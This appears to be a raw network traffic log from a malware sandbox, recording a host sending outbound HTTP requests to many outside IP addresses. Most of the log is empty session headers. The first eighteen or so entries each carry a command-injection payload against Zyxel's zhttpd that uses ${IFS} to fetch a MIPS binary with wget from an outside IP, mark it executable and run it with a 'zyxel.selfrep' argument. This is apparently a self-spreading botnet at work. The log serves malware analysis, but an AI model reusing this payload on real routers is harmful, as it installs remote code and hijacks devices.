                                      Jan 19, 2024 17:29:54.204495907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9698192.168.2.1434986156.17.83.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204545975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9699192.168.2.145146285.199.62.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204585075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9700192.168.2.1452936186.233.116.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204611063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9701192.168.2.1439770119.222.244.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204658985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9702192.168.2.1439472208.198.35.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204704046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9703192.168.2.144134060.27.246.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204735041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9704192.168.2.1443898212.176.253.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204796076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9705192.168.2.14338049.127.164.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204826117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9706192.168.2.144900870.10.38.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204883099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9707192.168.2.1453382202.15.73.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204933882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9708192.168.2.1446636118.65.218.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.204963923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9709192.168.2.145748612.185.77.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.205017090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9710192.168.2.1453844164.190.52.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.205045938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9711192.168.2.145022841.231.188.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.205081940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9712192.168.2.14473628.110.73.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.205130100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9713192.168.2.1456684153.45.205.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.205178976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9714192.168.2.145922436.141.55.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:54.205195904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9715192.168.2.1455796102.194.92.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9716192.168.2.1438664172.154.177.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9717192.168.2.1434988135.151.214.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9718192.168.2.144590820.31.75.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9719192.168.2.143349219.55.208.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9720192.168.2.145227478.251.211.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9721192.168.2.143935045.173.7.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9722192.168.2.1442534174.215.1.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9723192.168.2.1452512205.80.129.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9724192.168.2.1452878128.62.159.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9725192.168.2.1454670179.166.216.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9726192.168.2.143676236.23.57.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9727192.168.2.1449290107.30.102.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9728192.168.2.145139820.244.178.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9729192.168.2.1447878204.170.181.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9730192.168.2.144269846.126.36.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9731192.168.2.145099286.168.80.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9732192.168.2.145253014.69.215.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9733192.168.2.1434604129.119.167.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9734192.168.2.1448894219.149.179.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9735192.168.2.1456758189.137.162.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9736192.168.2.1453666196.220.77.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9737192.168.2.145238643.208.176.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9738192.168.2.1440502176.105.150.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9739192.168.2.144357448.44.247.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9740192.168.2.1442238187.88.98.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9741192.168.2.1451026181.10.235.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9742192.168.2.143307612.91.97.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9743192.168.2.145861846.105.251.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9744192.168.2.143414289.116.129.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9745192.168.2.1459802219.107.90.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9746192.168.2.145517651.142.187.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9747192.168.2.144236012.147.227.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9748192.168.2.145900238.246.95.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9749192.168.2.1453828211.193.153.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9750192.168.2.144543413.167.201.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9751192.168.2.144527252.17.118.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9752192.168.2.144304670.140.240.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9753192.168.2.1438670205.234.224.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9754192.168.2.1449076126.201.153.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9755192.168.2.1436672152.155.88.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9756192.168.2.1436322172.53.249.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9757192.168.2.1450644194.66.107.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9758192.168.2.1441278199.119.150.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9759192.168.2.145922078.46.212.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9760192.168.2.144135280.143.229.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9761192.168.2.1444042143.108.119.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9762192.168.2.143797424.39.150.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9763192.168.2.1440566140.93.7.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9764192.168.2.1453338164.0.149.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9765192.168.2.1455668195.67.13.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9766192.168.2.1433972217.54.149.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9767192.168.2.1439320160.0.133.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9768192.168.2.144146452.27.86.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9769192.168.2.145547067.150.99.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9770192.168.2.145825872.29.140.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9771192.168.2.145731876.137.146.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9772192.168.2.143569412.42.149.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9773192.168.2.146047889.193.227.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9774192.168.2.1446782165.146.29.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9775192.168.2.1455058123.155.197.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9776192.168.2.1434916133.179.178.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9777192.168.2.145044476.1.140.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9778192.168.2.1459146209.203.132.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9779192.168.2.144536076.36.98.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9780192.168.2.1440266211.146.74.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9781192.168.2.144349079.33.20.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9782192.168.2.1444140209.34.14.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9783192.168.2.143325063.152.56.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9784192.168.2.1452124219.87.235.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9785192.168.2.145966635.113.62.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9786192.168.2.1455994216.26.148.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9787192.168.2.1455166142.134.123.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9788192.168.2.1443190116.181.245.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9789192.168.2.143831848.135.38.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9790192.168.2.1439784195.217.208.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9791192.168.2.143455612.102.56.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9792192.168.2.1455532204.183.180.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9793192.168.2.1456784124.76.198.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9794192.168.2.1445310122.141.156.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9795192.168.2.144199877.65.252.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9796192.168.2.1446440141.40.61.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9797192.168.2.1433470162.71.16.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9798192.168.2.1444044202.192.132.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9799192.168.2.1458948197.2.199.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9800192.168.2.1441130121.63.24.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9801192.168.2.144384444.120.225.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9802192.168.2.14337302.144.81.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9803192.168.2.144674879.21.242.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9804192.168.2.145151096.52.10.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9805192.168.2.145805482.86.119.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9806192.168.2.1455430119.189.223.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9807192.168.2.144469818.197.63.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9808192.168.2.1445834142.177.210.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9809192.168.2.1448724170.120.22.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9810192.168.2.1449944207.214.26.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9811192.168.2.144017284.84.174.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9812192.168.2.1456586123.126.195.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9813192.168.2.1447954138.71.103.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9814192.168.2.1441604157.177.123.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9815192.168.2.1441940202.91.156.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9816192.168.2.145863644.252.56.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9817192.168.2.143404471.207.110.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9818192.168.2.1445870159.106.145.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9819192.168.2.1440520200.218.199.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9820192.168.2.1434418102.6.2.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9821192.168.2.144684889.136.86.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9822192.168.2.143524424.158.238.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9823192.168.2.1447158137.194.142.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9824192.168.2.144817069.160.131.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9825192.168.2.1453232194.178.23.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9826192.168.2.1453948144.143.255.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9827192.168.2.1458612148.97.122.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9828192.168.2.144220036.40.9.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9829192.168.2.143438696.146.53.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9830192.168.2.1432980189.62.249.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9831192.168.2.1439144158.248.210.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9832192.168.2.1437124171.13.31.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9833192.168.2.1442700137.34.138.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9834192.168.2.145312665.107.209.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9835192.168.2.144939619.81.33.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9836192.168.2.144963060.249.241.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9837192.168.2.1454690175.104.16.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9838192.168.2.1434672146.88.226.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9839192.168.2.1433688132.212.244.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9840192.168.2.1447630192.241.138.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9841192.168.2.1445076158.71.148.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9842192.168.2.1433456155.141.237.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9843192.168.2.1447702151.70.217.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9844192.168.2.144088478.187.225.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9845192.168.2.1453892148.48.7.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9846192.168.2.1446606159.247.94.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9847192.168.2.145941073.84.64.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9848192.168.2.1448250129.33.18.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9849192.168.2.1445374158.21.25.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9850192.168.2.143529437.93.109.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9851192.168.2.143363618.212.7.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9852192.168.2.145205863.49.196.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9853192.168.2.14439361.153.244.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9854192.168.2.1435546199.194.90.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9855192.168.2.144091280.117.199.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9856192.168.2.1436946144.81.33.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9857192.168.2.145506478.63.229.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9858192.168.2.1458226157.16.239.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9859192.168.2.1449258203.197.126.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9860192.168.2.144248266.215.75.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9861192.168.2.144013653.132.217.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9862192.168.2.1434682117.28.133.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9863192.168.2.143723883.9.183.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9864192.168.2.1432790219.208.65.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9865192.168.2.145627023.31.174.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9866192.168.2.1450684125.64.223.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9867192.168.2.1459302208.37.30.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9868192.168.2.144394234.224.51.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9869192.168.2.145148282.14.0.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9870192.168.2.144779054.93.45.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9871192.168.2.1442190113.255.171.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9872192.168.2.145900072.178.235.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9873192.168.2.1452438223.86.140.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9874192.168.2.14506722.174.29.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9875192.168.2.1460030182.235.168.255443
